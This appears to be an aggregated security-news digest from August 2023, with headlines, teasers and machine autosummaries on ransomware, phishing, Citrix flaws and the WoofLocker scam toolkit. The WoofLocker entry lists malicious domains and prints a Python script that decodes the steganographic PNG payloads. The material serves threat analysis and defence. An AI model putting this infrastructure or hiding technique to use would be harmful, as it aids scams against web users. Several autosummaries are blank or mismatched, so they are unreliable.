            2023-08-20 https://www.bleepingcomputer.com/news/security/cuba-ransomware-uses-veeam-exploit-against-critical-us-organizations/
            The Cuba ransomware gang was observed in attacks targeting critical infrastructure organizations in the United States and IT firms in Latin America, using a combination of old and new tools. [...] "

            Autosummary: Figure: Complete attack chain (BlackBerry). Cuba still very active: BlackBerry underlines the clear financial motivation of the Cuba ransomware gang and mentions that the threat group is likely Russian, something that has been hypothesized by other cyber-intelligence reports in the past. "


            Thousands of Android Malware Apps Using Stealthy APK Compression to Evade Detection

            exploits
            2023-08-19 https://thehackernews.com/2023/08/thousands-of-android-malware-apps-using.html
            Threat actors are using Android Package (APK) files with unknown or unsupported compression methods to elude malware analysis. That's according to findings from Zimperium, which found 3,300 artifacts leveraging such compression algorithms in the wild. 71 of the identified samples can be loaded on the operating system without any problems. There is no evidence that the apps were available on the "

            Autosummary: "


            WoofLocker Toolkit Hides Malicious Codes in Images to Run Tech Support Scams

            financial
            2023-08-19 https://thehackernews.com/2023/08/wooflocker-toolkit-hides-malicious.html
            Cybersecurity researchers have detailed an updated version of an advanced fingerprinting and redirection toolkit called WoofLocker that's engineered to conduct tech support scams. The sophisticated traffic redirection scheme was first documented by Malwarebytes in January 2020, leveraging JavaScript embedded in compromised websites to perform anti-bot and web traffic filtering checks to serve "

            Autosummary: "The tactics and techniques are very similar, but the infrastructure is now more robust than before to defeat potential takedown attempts," Jérôme Segura, director of threat intelligence at Malwarebytes, said. "


            Hackers use VPN provider's code certificate to sign malware

            exploits
            2023-08-19 https://www.bleepingcomputer.com/news/security/hackers-use-vpn-providers-code-certificate-to-sign-malware/
            The China-aligned APT (advanced persistent threat) group known as "Bronze Starlight" was seen targeting the Southeast Asian gambling industry with malware signed using a valid certificate used by the Ivacy VPN provider. [...] "

            Autosummary: Figure: Contents of the ZIP files fetched from cloud buckets (SentinelLabs). SentinelLabs notes that the .NET executables feature a geofencing restriction that prevents the malware from running in the United States, Germany, France, Russia, India, Canada, or the United Kingdom. "


            Ecuador election: Narco politics rule ahead of polls

            industry
            2023-08-18 https://www.bbc.co.uk/news/world-latin-america-66540765?at_medium=RSS&at_campaign=KARANGA
            A rise in drug crime in the once-peaceful country has dominated the build-up to Sunday's election. "

            Autosummary: "


            A closer look at the new TSA oil and gas pipeline regulations

            industry
            2023-08-18 https://www.helpnetsecurity.com/2023/08/18/tsa-oil-and-gas-pipeline-regulations-video/

            The TSA has announced updates to its Security Directive (SD) to strengthen the operational resilience of oil and natural gas pipeline owners and operators against cyber-attacks. In this Help Net Security video, Chris Warner, OT Senior Security Consultant at GuidePoint Security, discusses how these newly introduced provisions mandate pipeline owners and operators to proactively enhance their systems’ security and protect against potential cybersecurity threats in the oil and natural gas sector. Despite the resource challenges, … More

            The post A closer look at the new TSA oil and gas pipeline regulations appeared first on Help Net Security.

            "

            Autosummary: "


            30% of phishing threats involve newly registered domains

            financial
            2023-08-18 https://www.helpnetsecurity.com/2023/08/18/phishing-email-threat/

            Phishing remains the most dominant and fastest growing internet crime, largely due to the ubiquity of email and the ceaseless issue of human error that is preyed upon by today’s threat actors, according to Cloudflare. While business email compromise (BEC) losses have topped $50 billion, corporate organizations are not the only victims that attackers are after. The real implications of phishing go beyond Fortune 500’s and global companies, extending to small and local organizations as … More

            The post 30% of phishing threats involve newly registered domains appeared first on Help Net Security.

            "

            Autosummary: Phishing attack trends: malicious links were the #1 threat category, comprising 35.6% of detected threats. Identity deception threats are on the rise, increasing YoY from 10.3% to 14.2% (39.6 million) of total detections. Attackers posed as more than 1,000 different organizations in over 1 billion brand impersonation attempts. "


            Zimbra users in Europe, Latin America face phishing threat

            financial
            2023-08-18 https://www.helpnetsecurity.com/2023/08/18/zimbra-phishing/

            ESET researchers have uncovered a mass-spreading phishing campaign aimed at collecting Zimbra account users’ credentials. Zimbra Collaboration is an open-core collaborative software platform, a popular alternative to enterprise email solutions. About the Zimbra phishing campaign: the campaign has been active since at least April 2023 and is still ongoing. Its targets are a variety of small and medium businesses and governmental entities. According to ESET telemetry, the largest number of targets are located in Poland; … More

            The post Zimbra users in Europe, Latin America face phishing threat appeared first on Help Net Security.

            "

            Autosummary: In this manner, it is much easier to circumvent reputation-based antispam policies, especially compared to more prevalent phishing techniques, where a malicious link is directly placed in the email body,” explains ESET researcher Viktor Šperka, who discovered the campaign. "


            14 Suspected Cybercriminals Arrested Across Africa in Coordinated Crackdown

            ciber
            2023-08-18 https://thehackernews.com/2023/08/14-suspected-cybercriminals-arrested.html
            A coordinated law enforcement operation across 25 African countries has led to the arrest of 14 suspected cybercriminals, INTERPOL announced Friday. The exercise, conducted in partnership with AFRIPOL, enabled investigators to identify 20,674 cyber networks that were linked to financial losses of more than $40 million. "The four-month Africa Cyber Surge II operation was launched in April 2023 "

            Autosummary: "


            The Vulnerability of Zero Trust: Lessons from the Storm 0558 Hack

            exploits
            2023-08-18 https://thehackernews.com/2023/08/the-vulnerability-of-zero-trust-lessons.html
            While IT security managers in companies and public administrations rely on the concept of Zero Trust, APTs (Advanced Persistent Threats) are putting its practical effectiveness to the test. Analysts, on the other hand, understand that Zero Trust can only be achieved with comprehensive insight into one's own network. Just recently, an attack believed to be perpetrated by the Chinese hacker group "

            Autosummary: Examples of such deviations include suspicious connections, unusual data transfers, traffic patterns that fall outside established norms, lateral movements within the network, data exfiltration, and more. According to the Forrester report, security and risk professionals should employ Network Detection and Response (NDR) tools to monitor their networks, search for threats, detect applications and assets, and capture malicious data packets. Cybercriminals use fake identities or zero-day exploits to infiltrate corporate networks, then move laterally across the network to search for targets, gain access to privileged systems, install ransomware or other malware, and exfiltrate corporate data. "


            New BlackCat Ransomware Variant Adopts Advanced Impacket and RemCom Tools

            exploits ransomware
            2023-08-18 https://thehackernews.com/2023/08/new-blackcat-ransomware-variant-adopts.html
            Microsoft on Thursday disclosed that it found a new version of the BlackCat ransomware (aka ALPHV and Noberus) that embeds tools like Impacket and RemCom to facilitate lateral movement and remote code execution. "The Impacket tool has credential dumping and remote service execution modules that could be used for broad deployment of the BlackCat ransomware in target environments," the company's "

            Autosummary: Another notable tactic is the targeting of managed service providers (MSPs) as entry points to breach downstream corporate networks, as evidenced in a Play ransomware campaign aimed at finance, software, legal, and shipping and logistics industries, as well as state, local, tribal and territorial (SLTT) entities in the U.S., Australia, U.K., and Italy. "


            Interpol arrests 14 suspected cybercriminals for stealing $40 million

            ciber
            2023-08-18 https://www.bleepingcomputer.com/news/security/interpol-arrests-14-suspected-cybercriminals-for-stealing-40-million/
            An international law enforcement operation led by Interpol has led to the arrest of 14 suspected cybercriminals in an operation codenamed "Africa Cyber Surge II," launched in April 2023. [...] "

            Autosummary: Specifically, Interpol's and its partners' investigation, whose findings served as the guidance for "Africa Cyber Surge II", includes the following: 3,786 malicious command and control servers; 14,134 victim IPs linked to data stealer cases; 1,415 phishing links and domains; 939 scam IPs; over 400 other malicious URLs, IPs, and botnets. Group-IB, one of Interpol's partners in collecting intelligence from cybercrime originating from African regions, today stated that it provided the law enforcement authorities with over a thousand indicators related to malicious infrastructure in the continent. "


            The Week in Ransomware - August 18th 2023 - LockBit on Thin Ice

            exploits ransomware
            2023-08-18 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-18th-2023-lockbit-on-thin-ice/
            While there was quite a bit of ransomware news this week, the highlighted story was the release of Jon DiMaggio's third article in the Ransomware Diaries series, with the focus of this article on the LockBit ransomware operation. [...] "

            Autosummary: Contributors and those who provided new ransomware information and stories this week include: @malwrhunterteam, @LawrenceAbrams, @fwosar, @BleepinComputer, @billtoulas, @serghei, @Seifreed, @demonslay335, @Jon__DiMaggio, @security_score, @vxunderground, @MsftSecIntel, @TrendMicro, @IBMSecurity, @felixw3000, @uptycs, @BushidoToken, @adlumin, and @pcrisk. The campaign is currently targeting mid-market enterprises in the finance, software, legal, and shipping and logistics industries, as well as state, local, tribal and territorial (SLTT) entities in the U.S., Australia, U.K., and Italy. "


            Patch now! Citrix Sharefile joins the list of actively exploited file sharing software

            exploits
            2023-08-18 https://www.malwarebytes.com/blog/news/2023/08/citrix-sharefile-joins-list-of-vulnerabilities-in-file-sharing-software

            Categories: Exploits and vulnerabilities

            Categories: News

            Tags: Citrix

            Tags: ShareFile

            Tags: CVE-2023-24489

            Tags: RCE

            Tags: unauthenticated

            Tags: vulnerability

            Tags: PoC

            Citrix ShareFile can be exploited remotely by unauthenticated attackers.


            The post Patch now! Citrix Sharefile joins the list of actively exploited file sharing software appeared first on Malwarebytes Labs.

            "

            Autosummary: Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files. Due to errors in how ShareFile handles cryptographic operations, attackers can generate valid padding which enables unauthenticated attackers to upload arbitrary files, leading to remote code execution (RCE). "


            Russian Hackers Use Zulip Chat App for Covert C&C in Diplomatic Phishing Attacks

            financial rusia-ucrania
            2023-08-17 https://thehackernews.com/2023/08/russian-hackers-use-zulip-chat-app-for.html
            An ongoing campaign targeting ministries of foreign affairs of NATO-aligned countries points to the involvement of Russian threat actors. The phishing attacks feature PDF documents with diplomatic lures, some of which are disguised as coming from Germany, to deliver a variant of a malware called Duke, which has been attributed to APT29 (aka BlueBravo, Cloaked Ursa, Cozy Bear, Iron Hemlock, "

            Autosummary: The phishing attacks feature PDF documents with diplomatic lures, some of which are disguised as coming from Germany, to deliver a variant of a malware called Duke, which has been attributed to APT29 (aka BlueBravo, Cloaked Ursa, Cozy Bear, Iron Hemlock, Midnight Blizzard, and The Dukes). "


            Cleaning Products manufacturer Clorox Company took some systems offline after a cyberattack

            industry ciber
            2023-08-17 https://securityaffairs.com/149585/cyber-crime/clorox-company-cyber-attack.html

            Cleaning products manufacturer Clorox Company announced that it has taken some systems offline in response to a cyberattack. The Clorox Company is a multinational consumer goods company that specializes in the production and marketing of various household and professional cleaning, health, and personal care products. The cleaning product giant announced it was the victim of […]

            The post Cleaning Products manufacturer Clorox Company took some systems offline after a cyberattack appeared first on Security Affairs.

            "

            Autosummary: "


            China hacks the US military and government— the Feds blame Microsoft

            government
            2023-08-17 https://www.computerworld.com/article/3704497/china-hacks-the-us-military-and-government-the-feds-blame-microsoft.html#tk.rss_security

            Hidden in the basic infrastructure that runs the US military is a powerful piece of Windows-borne Chinese malware that can disrupt the communications systems, power grids, and water supplies at the military’s bases around the world. One US congressional aide calls it a “ticking time bomb” that as The New York Times put it, “could give China the power to interrupt or slow American military deployments or resupply operations by cutting off power, water and communications to US military bases.”


            "

            Autosummary: According to Microsoft, the hack, called Storm-0558, "focuses on espionage, data theft, and credential access.” It’s hacked into the accounts not just of Raimondo, but also, the Washington Post reports, “the email accounts of a congressional staffer, a U.S. human rights advocate and U.S. think tanks.” Former officials said the hack “would have allowed Beijing to see into diplomats' planning for a succession of high stakes visits to China in June and July by U.S. cabinet members, including Secretary of State Antony Blinken, Raimondo and US Treasury Secretary Janet Yellen," according to Newsweek. "


            FBI warns cryptocurrency app beta-testers of malware menace

            exploits
            2023-08-17 https://www.bitdefender.com/blog/hotforsecurity/fbi-warns-cryptocurrency-app-beta-testers-of-malware-menace/
            Are you the kind of person who runs the beta-test versions of mobile apps before they are officially released? If so, the FBI is warning you to be on your guard. Read more in my article on the Hot for Security blog. "

            Autosummary: Error. "


            Citrix ShareFile vulnerability actively exploited (CVE-2023-24489)

            exploits
            2023-08-17 https://www.helpnetsecurity.com/2023/08/17/cve-2023-24489-exploited/

            CVE-2023-24489, a critical Citrix ShareFile vulnerability that the company fixed in June 2023, is being exploited by attackers. GreyNoise flagged on Tuesday a sudden spike in IP addresses from which exploitation attempts are coming, and the Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities Catalog. About CVE-2023-24489: unearthed and reported by Assetnote researcher Dylan Pindur, CVE-2023-24489 affects the popular cloud-based file-sharing application Citrix ShareFile, more specifically its … More

            The post Citrix ShareFile vulnerability actively exploited (CVE-2023-24489) appeared first on Help Net Security.

            "

            Autosummary: About CVE-2023-24489 Unearthed and reported by Assetnote researcher Dylan Pindur, CVE-2023-24489 affects the popular cloud-based file-sharing application Citrix ShareFile, more specifically its storage zones controller (a .NET web application running under IIS). "


            Why You Need Continuous Network Monitoring?

            ransomware
            2023-08-17 https://thehackernews.com/2023/08/why-you-need-continuous-network.html
            Changes in the way we work have had significant implications for cybersecurity, not least in network monitoring. Workers no longer sit safely side-by-side on a corporate network, dev teams constantly spin up and tear down systems, exposing services to the internet. Keeping track of these users, changes and services is difficult – internet-facing attack surfaces rarely stay the same for long. But "

            Autosummary: From the hardware and software of the network itself, to all the devices used to access it, from IoT endpoints to laptops and smartphones, network security now needs to look beyond the perimeter to your cloud resources, edge devices, third-party hosted content, integrations with other hardware or software, and assets hosted in dispersed offices. Continuous network monitoring with Intruder: advanced network monitoring tools like Intruder run daily network scans so your network view is always accurate and up to date – showing active and unresponsive targets, any changes since your last scan, expiring certificates, and the ports and services you expect – and more importantly, don't expect – to be exposed to the internet. "


            Phishing campaign steals accounts for Zimbra email servers worldwide

            financial
            2023-08-17 https://www.bleepingcomputer.com/news/security/phishing-campaign-steals-accounts-for-zimbra-email-servers-worlwide/
            An ongoing phishing campaign has been underway since at least April 2023 that attempts to steal credentials for Zimbra Collaboration email servers worldwide. [...] "

            Autosummary: Figure: Targets heatmap (ESET). Pretending to be Zimbra admins: according to the ESET researchers, the attacks start with a phishing email pretending to be from an organization's admin informing users of an imminent email server update, which will result in temporary account deactivation. "


            Triple Extortion Ransomware and the Cybercrime Supply Chain

            exploits ransomware
            2023-08-17 https://www.bleepingcomputer.com/news/security/triple-extortion-ransomware-and-the-cybercrime-supply-chain/
            Ransomware attacks continue to grow both in sophistication and quantity. Learn more from Flare about ransomware operation's increasing shift to triple extortion. [...] "

            Autosummary: Triple Extortion Ransomware in Context: The Broader Cybercrime Ecosystem. The broader cybercrime ecosystem also acts as a crucial enabler for ransomware groups by offering services like bulletproof hosting, money laundering, initial access to environments, and employee credentials via stealer logs. Figure: An IAB advertises access to a European company for $250 (Source: Flare). In many cases, we have seen access brokers advertise that they have access to a victim's backup and recovery systems or that the victim lacks backup and recovery, providing further evidence that IABs expect their listings to be used for ransomware. "


            New Apple iOS 16 Exploit Enables Stealthy Cellular Access Under Fake Airplane Mode

            exploits
            2023-08-17 https://thehackernews.com/2023/08/new-apple-ios-16-exploit-enables.html
            Cybersecurity researchers have documented a novel post-exploit persistence technique on iOS 16 that could be abused to fly under the radar and maintain access to an Apple device even when the victim believes it is offline. The method "tricks the victim into thinking their device's Airplane Mode works when in reality the attacker (following successful device exploit) has planted an artificial "

            Autosummary: Airplane Mode, as the name implies, allows users to turn off wireless features in their devices, effectively preventing them from connecting to Wi-Fi networks, cellular data, and Bluetooth as well as sending or receiving calls and text messages. "


            New LABRAT Campaign Exploits GitLab Flaw for Cryptojacking and Proxyjacking Activities

            exploits
            2023-08-17 https://thehackernews.com/2023/08/new-labrat-campaign-exploits-gitlab.html
            A new, financially motivated operation dubbed LABRAT has been observed weaponizing a now-patched critical flaw in GitLab as part of a cryptojacking and proxyjacking campaign. "The attacker utilized undetected signature-based tools, sophisticated and stealthy cross-platform malware, command-and-control (C2) tools which bypassed firewalls, and kernel-based rootkits to hide their presence," Sysdig "

            Autosummary: "The attacker utilized undetected signature-based tools, sophisticated and stealthy cross-platform malware, command-and-control (C2) tools which bypassed firewalls, and kernel-based rootkits to hide their presence," Sysdig said in a report shared with The Hacker News. "


            Alarming lack of cybersecurity practices on world’s most popular websites

            ciber
            2023-08-17 https://securityaffairs.com/149607/security/alarming-lack-cybersecurity-popular-websites.html

            The world’s most popular websites lack basic cybersecurity hygiene, an investigation by Cybernews shows. Do you happen to love exploring DIY ideas on Pinterest? Scrolling through IMDB to pick the next movie to watch? Or simply scrolling through Facebook to see what your friends and enemies have been up to? The Cybernews research team has […]

            The post Alarming lack of cybersecurity practices on world’s most popular websites appeared first on Security Affairs.

            "

            Autosummary: Why does any of this matter? Original post at: https://cybernews.com/security/most-popular-websites-cyber-hygiene/ About the author: Jurgita Lapienytė, Chief Editor at CyberNews. Pierluigi Paganini (SecurityAffairs – hacking, popular websites). As per our researchers, the most common attacks include: phishing; cross-site scripting (XSS); man-in-the-middle (MITM) attacks that usually occur on free public wifi or other open networks. “Security headers are important security layers. "


            Experts devise an exploit for Apple iOS 16 that relies on fake Airplane Mode

            exploits
            2023-08-17 https://securityaffairs.com/149597/mobile-2/airplane-mode-apple-ios-16-exploit.html

            Researchers detailed a new exploit for Apple iOS 16 that can allow attackers to gain access to a device even when the victim believes it is in Airplane Mode. Jamf Threat Labs researchers developed a post-exploit persistence technique on iOS 16 that tricks victims into believing that the device is in functional Airplane Mode. In […]

            The post Experts devise an exploit for Apple iOS 16 that relies on fake Airplane Mode appeared first on Security Affairs.

            "

            Autosummary: Below is a video PoC of the exploit: https://vimeo.com/user100736884 Pierluigi Paganini (SecurityAffairs – hacking, Apple iOS 16 exploit) "


            Microsoft: BlackCat's Sphynx ransomware embeds Impacket, RemCom

            exploits ransomware
            2023-08-17 https://www.bleepingcomputer.com/news/microsoft/microsoft-blackcats-sphynx-ransomware-embeds-impacket-remcom/
            Microsoft has discovered a new version of the BlackCat ransomware that embeds the Impacket networking framework and the Remcom hacking tool, both enabling spreading laterally across a breached network. [...] "

            Autosummary: However, it is more commonly used as a post-exploitation toolkit by penetration testers, red teamers, and threat actors to spread laterally on a network, dump credentials from processes, perform NTLM relay attacks, and much more. "


            Catching up with WoofLocker, the most elaborate traffic redirection scheme to tech support scams

            financial
            2023-08-17 https://www.malwarebytes.com/blog/threat-intelligence/2023/08/wooflocker2

            Categories: Threat Intelligence

            Tags: tech support scams

            Tags: fingerprinting

            Tags: steganography

            This tech support scam is one of the most long running and covert ones we have ever seen.


            The post Catching up with WoofLocker, the most elaborate traffic redirection scheme to tech support scams appeared first on Malwarebytes Labs.

            "

            Autosummary: Indicators of Compromise. Fingerprinting and redirection infrastructure: api[.]cloudcachestels[.]com, api[.]cloudseedzedo[.]com, api[.]imagecloudsedo[.]com, appcloudzedo[.]com, cdn[.]contentob[.]com, cdncontentstorage[.]com, cdnpictureasset[.]com, cloudcusersyn[.]com, cloudgertopage[.]com, cloudlogobox[.]com, csscloudstorage[.]com, datacloudasset[.]com, logosvault[.]com, miniassetcloud[.]com. Recent browser locker domains: furakelw[.]com, gopilofan[.]com, zemolist[.]com, besoliza[.]com, vedopixt[.]com, defolis[.]com, somawan[.]com, vulidoc[.]com, barustan[.]com, semilupa[.]com, bopiland[.]com, somalics[.]com, sebasong[.]com, molesanu[.]com, xepilondi[.]com, malubana[.]com, beeronas[.]com, lobosixt[.]com, gomoyad[.]com.

            Decoder script for the steganographic PNG, reconstructed from the fragment in the original summary (the fragment starts after the pixel data has been loaded; the Pillow call that loads it below is an assumption, not part of the original):

                import sys
                from PIL import Image  # assumption: the original loaded the PNG pixels with Pillow

                # Read the PNG named on the command line as a list of (R, G, B) tuples.
                imgdata = list(Image.open(sys.argv[1]).convert("RGB").getdata())
                tt = []
                data = ""
                # Flatten the R, G and B values of every pixel into one byte list.
                for i in range(len(imgdata)):
                    tt.append(imgdata[i][0])
                    tt.append(imgdata[i][1])
                    tt.append(imgdata[i][2])
                # Each byte is XORed with the constant 57; only printable results are kept.
                for i in range(len(tt)):
                    ar = 57 ^ tt[i]
                    if ar >= 32:
                        data += chr(ar)
                # Write the recovered text next to the input file.
                open(sys.argv[1] + ".decode", "w").write(data)

            Figure 5: Decoded output from PNG image URL redirection. We were able to identify the redirection URL this time, after numerous replays and debugging attempts. Figure 6: Browser locker URL is sent hidden in PNG image. Again, the threat actor uses steganography to include JavaScript code inside of an image. Originally, the injected code was not obfuscated and contained the fingerprinting checks, but in 2021 the threat actors changed it, to simplify the injection and move some of the logic outside. Figure 2: Code injected into compromised sites (comparison). In the image below, we are using Chrome's Developer Tools to see malicious code dynamically injected into the DOM. "


            Citrix NetScalers backdoored in widespread exploitation campaign

            exploits
            2023-08-17 https://www.malwarebytes.com/blog/news/2023/08/citrix-netscalers-backdoored-in-widespread-exploitation-campaign

            Categories: Exploits and vulnerabilities

            Categories: News

            Tags: Citrix

            Tags: NetScalers

            Tags: Germany

            Tags: CVE-2023-3519

            Tags: Fox-IT

            Tags: DIVD

            Researchers have found almost 2000 backdoored Citrix NetScalers, many of which were patched after the backdoor in the form of a web shell was dropped.

            (Read more...)

            The post Citrix NetScalers backdoored in widespread exploitation campaign appeared first on Malwarebytes Labs.

            "

            Autosummary: Prevention, detection and response. If your Citrix server hasn’t been updated to a secure version, we strongly advise you to patch it as soon as possible, especially if you’re utilizing any of the following features:
            SSL VPN
            ICA Proxy
            CVPN
            RDP Proxy
            AAA virtual server
            If you are not using one of these servers, we still recommend that you patch to a non-vulnerable version to prevent your appliance from becoming vulnerable when you start using one of these functions in the future. There are several resources available that document the in-the-wild exploitation of Citrix appliances where forensic artifacts can be found:
            https://www.shadowserver.org/news/technical-summary-of-observed-citrix-cve-2023-3519-incidents/
            https://www.mandiant.com/resources/blog/citrix-zero-day-espionage
            https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-201a
            https://support.citrix.com/article/CTX561482/citrix-adc-and-citrix-gateway-security-bulletin-for-cve20233519-cve20233466-cve20233467
            Fox-IT has provided a Python script that utilizes Dissect to perform triage on forensic images of NetScalers. "


            SEC cybersecurity rules shape the future of incident management

            ciber
            2023-08-16 https://www.helpnetsecurity.com/2023/08/16/sec-cybersecurity-rules-video/

            The SEC adopted rules requiring registrants to disclose material cybersecurity incidents they experience and to disclose on an annual basis material information regarding their cybersecurity risk management, strategy, and governance. The Commission also adopted rules requiring foreign private issuers to make comparable disclosures. In this Help Net Security video, Doug Barbin, President and National Managing Principal at Schellman, shares his perspective on what this means for enterprises moving forward. To accomplish the requirements of the … More

            The post SEC cybersecurity rules shape the future of incident management appeared first on Help Net Security.

            "

            Autosummary: "


            Passwordless is more than a buzzword among cybersecurity pros

            ciber
            2023-08-16 https://www.helpnetsecurity.com/2023/08/16/passwords-evolving-passwordless/

            Password security remains highly relevant even as cybersecurity strategies move toward a passwordless future. Of the 100 Black Hat USA 2023 attendees Delinea polled, 54% said passwordless is a viable concept, while 79% agreed that passwords are evolving or becoming obsolete. When asked how they protect their passwords, most attendees surveyed indicated they use an additional authentication method to secure their credentials and identity. 73% use some form of multi-factor authentication (MFA), 57% specifically indicated … More

            The post Passwordless is more than a buzzword among cybersecurity pros appeared first on Help Net Security.

            "

            Autosummary: "


            Nearly 2,000 Citrix NetScaler Instances Hacked via Critical Vulnerability

            exploits
            2023-08-16 https://thehackernews.com/2023/08/nearly-2000-citrix-netscaler-instances.html
            Nearly 2,000 Citrix NetScaler instances have been compromised with a backdoor by weaponizing a recently disclosed critical security vulnerability as part of a large-scale attack. "An adversary appears to have exploited CVE-2023-3519 in an automated fashion, placing web shells on vulnerable NetScalers to gain persistent access," NCC Group said in an advisory released Tuesday. "The adversary can "

            Autosummary: "


            LockBit’s dirty little secret: ransomware gang is failing to publish victims’ data

            exploits ransomware
            2023-08-16 https://grahamcluley.com/lockbits-dirty-little-secret-ransomware-gang-is-failing-to-publish-victims-data/
            The LockBit ransomware gang may be having more than a few headaches right now. According to a researcher who spent a year undercover gathering intelligence on the LockBit group, the ransomware gang is trying to cover up "the fact it often cannot consistently publish stolen data." "

            Autosummary: "


            Bitdefender enhances security for iOS devices with Scam Alert

            financial
            2023-08-16 https://www.helpnetsecurity.com/2023/08/16/bitdefender-ios-scam-alert/

            Bitdefender has launched an advanced security feature for iOS users, Scam Alert. The new technology protects users from phishing scams delivered through SMS/MMS messages and calendar invites. Layered on top of existing protection in Bitdefender Mobile Security for iOS, Scam Alert proactively identifies attacks and prevents them from reaching the mobile user – providing iPhone and iPad users complete, layered protection. Cybercriminals are increasingly targeting Apple operating systems dispelling a common myth that little or … More

            The post Bitdefender enhances security for iOS devices with Scam Alert appeared first on Help Net Security.

            "

            Autosummary: “Threat actors are incredibly resourceful at leveraging social engineering efforts to steal money or personal information,” said Ciprian Istrate, SVP of operations, Consumer Solutions Group at Bitdefender. "


            What's the State of Credential theft in 2023?

            government
            2023-08-16 https://thehackernews.com/2023/08/whats-state-of-credential-theft-in-2023.html
            At a little over halfway through 2023, credential theft is still a major thorn in the side of IT teams. The heart of the problem is the value of data to cybercriminals and the evolution of the techniques they use to get hold of it. The 2023 Verizon Data Breach Investigations Report (DBIR) revealed that 83% of breaches involved external actors, with almost all attacks being financially motivated "

            Autosummary: Protect your business against stolen credentials. With a full 49% of breaches involving stolen credentials and evolving digital black markets, such as Genesis, tools dedicated to detecting compromised passwords are vital for overworked IT departments. Verizon's DBIR noted that 74% of breaches include the human element, either through human error, privilege misuse, social engineering, or stolen credentials. "


            Massive 400,000 proxy botnet built with stealthy malware infections

            exploits
            2023-08-16 https://www.bleepingcomputer.com/news/security/massive-400-000-proxy-botnet-built-with-stealthy-malware-infections/
            A new campaign involving the delivery of proxy server apps to Windows systems has been uncovered, where users are reportedly involuntarily acting as residential exit nodes controlled by a private company. [...] "

            Autosummary: "Although the proxy website claims that its exit nodes come only from users who have been informed and agreed to the use of their device, Alien Labs has evidence that malware writers are installing the proxy silently in infected systems," AT&T Alien Labs "In addition, as the proxy application is signed, it has no anti-virus detection, going under the radar of security companies," the researchers added. "


            Major U.S. energy org targeted in QR code phishing attack

            financial industry
            2023-08-16 https://www.bleepingcomputer.com/news/security/major-us-energy-org-targeted-in-qr-code-phishing-attack/
            A phishing campaign was observed predominantly targeting a notable energy company in the US, employing QR codes to slip malicious emails into inboxes and bypass security. [...] "

            Autosummary: Roughly one-third (29%) of the 1,000 emails attributed to this campaign targeted a large US energy company, while the remaining attempts were made against firms in manufacturing (15%), insurance (9%), technology (7%), and financial services (6%). "


            Hacked electronic sign declares “Putin is a dickhead” as Russian ruble slumps

            rusia-ucrania
            2023-08-16 https://grahamcluley.com/hacked-electronic-sign-putin/
            Someone clearly isn't very impressed with Vladimir Putin, as the Russian economy continues to tank in the wake of sanctions. "

            Autosummary: "


            Stellar Cyber and OCI partner to offer expanded cybersecurity capabilities

            ciber
            2023-08-16 https://www.helpnetsecurity.com/2023/08/16/stellar-cyber-oci/

            Stellar Cyber has unveiled that the Stellar Cyber Open XDR platform is available on Oracle Cloud Infrastructure (OCI) to help users manage their security operations. Joint customers of Oracle and Stellar Cyber can expect to reduce cyber risk and improve security analyst efficiency and effectiveness. “We find that OCI is a user-friendly platform, which correlates directly to our commitment to making security operations simpler,” said Andrew Homer, VP of Strategic Alliances for Stellar Cyber. “We … More

            The post Stellar Cyber and OCI partner to offer expanded cybersecurity capabilities appeared first on Help Net Security.

            "

            Autosummary: "


            CISA warns of critical Citrix ShareFile flaw exploited in attacks

            exploits
            2023-08-16 https://www.bleepingcomputer.com/news/security/cisa-warns-of-critical-citrix-sharefile-flaw-exploited-in-attacks/
            CISA is warning that a critical Citrix ShareFile secure file transfer vulnerability tracked as CVE-2023-24489 is being targeted by unknown actors and has added the flaw to its catalog of known security flaws exploited in the wild. [...] "

            Autosummary: Since then, Clop has conducted numerous data-theft campaigns using zero-day flaws in SolarWinds Serv-U, GoAnywhere MFT, and, most recently, the massive attacks on MOVEit Transfer servers. "


            CISA warns of critical Citrix ShareFile flaw exploited in the wild

            exploits
            2023-08-16 https://www.bleepingcomputer.com/news/security/cisa-warns-of-critical-citrix-sharefile-flaw-exploited-in-the-wild/
            CISA is warning that a critical Citrix ShareFile secure file transfer vulnerability tracked as CVE-2023-24489 is being targeted by unknown actors and has added the flaw to its catalog of known security flaws exploited in the wild. [...] "

            Autosummary: Since then, Clop has conducted numerous data-theft campaigns using zero-day flaws in SolarWinds Serv-U, GoAnywhere MFT, and, most recently, the massive attacks on MOVEit Transfer servers. "


            Beware malware posing as beta versions of legitimate apps, warns FBI

            exploits
            2023-08-16 https://www.malwarebytes.com/blog/news/2023/08/beta-testing-apps-can-turn-out-to-be-costly-warns-fbi

            Categories: News

            Tags: FBI

            Tags: warning

            Tags: beta-testing

            Tags: malicious code

            Tags: crypto recovery

            Tags: scammers

            The FBI has issued a warning about two related types of fraud, malicious beta-testing apps and crypto recovery schemes.

            (Read more...)

            The post Beware malware posing as beta versions of legitimate apps, warns FBI appeared first on Malwarebytes Labs.

            "

            Autosummary: The agency says it’s aware of fraud schemes where the victims are contacted and directed to download mobile beta-testing apps, such as cryptocurrency exchanges, that steal money instead of investing it. For criminals, "beta-testing" apps offer a plausible reason for victims to download software from unsafe places, away from the usual app stores, without raising their suspicions. "


            CISA adds flaw in Citrix ShareFile to its Known Exploited Vulnerabilities catalog

            exploits
            2023-08-16 https://securityaffairs.com/149578/hacking/citrix-sharefile-known-exploited-vulnerabilities-catalog.html

            US CISA added critical vulnerability CVE-2023-24489 in Citrix ShareFile to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added critical flaw CVE-2023-24489 (CVSS score 9.8) affecting Citrix ShareFile to its Known Exploited Vulnerabilities Catalog. Citrix ShareFile is a secure file sharing and storage platform designed for businesses and professionals to collaborate on documents, exchange […]

            The post CISA adds flaw in Citrix ShareFile to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.

            "

            Autosummary: “A vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller.” "


            A massive phishing campaign using QR codes targets the energy sector

            financial industry
            2023-08-16 https://securityaffairs.com/149567/hacking/phishing-campaign-qr-codes.html

